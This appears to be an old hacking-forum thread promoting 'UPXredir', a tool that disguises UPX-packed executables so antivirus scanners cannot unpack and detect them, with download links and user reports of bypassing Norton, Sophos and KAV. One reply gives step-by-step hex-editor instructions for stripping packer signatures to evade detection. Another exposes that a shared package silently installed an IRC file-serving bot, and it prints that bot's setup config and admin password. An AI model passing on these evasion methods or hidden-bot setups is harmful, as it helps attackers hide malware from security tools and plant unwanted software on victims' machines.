UPXredir

This tool takes a packed UPX file and smacks on a section and does a few more things of trickery to transform it to not look like a UPX packed file so when anti-virii comes only they can't decompress the packed data and see it's raw form. Includes sourcecode and binary, written in Delphi 6.

Screenshot: http://archphase.united.net.kg/upxredir.bmp


I tested it on KAV online virii scan and seems to bypass measures there and seeing as KAV is the best in my mind i think it would follow that NAV/McAffe would miss it too, but feedback is appreciated.

get it @: http://nuclearwinter.e-plutonia.com or http://archphase.united.net.kg

Thank you dude, great tool. I think I bypassed Norton AntiVirus with it

Cool Dude...

I havent tried it yet...but its really great to get the idea to do it...

Onlinepass

hehe the tool worx perfectl!
i have sophos on my pc and norton on another and both avs couldnt find a virus after packing ^^

greetz

Wow very nice. thanks.

Very Nice DuDe! 10x!

Thxs guys makes my work all the more desirable, very trival method, I doubt they'll pick it up, if they do I'll come up w/ something new.

many th@nx dude nice work !

hehe worX great .. thanx mate

nice job .. when i try it i will tell u my opinion , this program would help me much !

sweet archphase!

ive packed my whole collection with it and a lot exe's doesn't work anymore.. but the ones that still work are undetectable for AV now so nice tool anyway

hehe kewl

/me agrees with BLSP

Thats his xdcc bot in a rar sfx executable package...perhaps someone wants to decrypt his iroffer password (unix based use JTR) and bring down his botnet, and maybe next time he'll think before he posts things like this.

haha no shit
Path=C:\winnt\system32\
SavePath
Setup=C:\winnt\system32\start.bat
Silent=1
Overwrite=1

server irc.rizon.net 6667
channel #PrO-WaReZ -plist 14
adminpass aqoOVCBv2fTGs
adminhost *@*
adminhost *@*

it aint a botnet its a rootkit script u just send it to a bot and exec it put it in the wrong downloads thingi though was supposed to put it in the jab rootkit 1

Calm down BeNiNuK, pls dont come harras me on IRC networks, dont make such a big deal of it.

nice one BeNiNuK, not detectable by AV either (22nd jan defintions)
can u give more info on this, what sort of functions does it have, etc

its a xdcc bot(www.iroffer.org) its used for making computers send out files over IRC.

thanks thom, although ive heard of iroffer before i was just a bit confused when BeNiNuK said it wasnt a botnet

Wow, works very well, thanks alot for sharing

it aint hard to use a basic method which I explained in detail a while ago now...

BTW this method should work with jst about any compactor....

[1] Get a Hex Editor like psedit or Ultra-edit
[2] Open compressed File.
[3] search for String "UPX" or "upx"
[4] replace with "EHH" or whatever.
[5] try opening it with compactor
[6] Error filetype Unrecognised....

Simple.

Wkd...

I think that you could create a simple ASM proggy to Achieve the above Mentioned Tactic... but it would be nice to be able to also Reverse it if you wanted to in the future also...

Wkd...

more advanced upxcrypt available: http://archphase.united.net.kg/files/upxcrypt.rar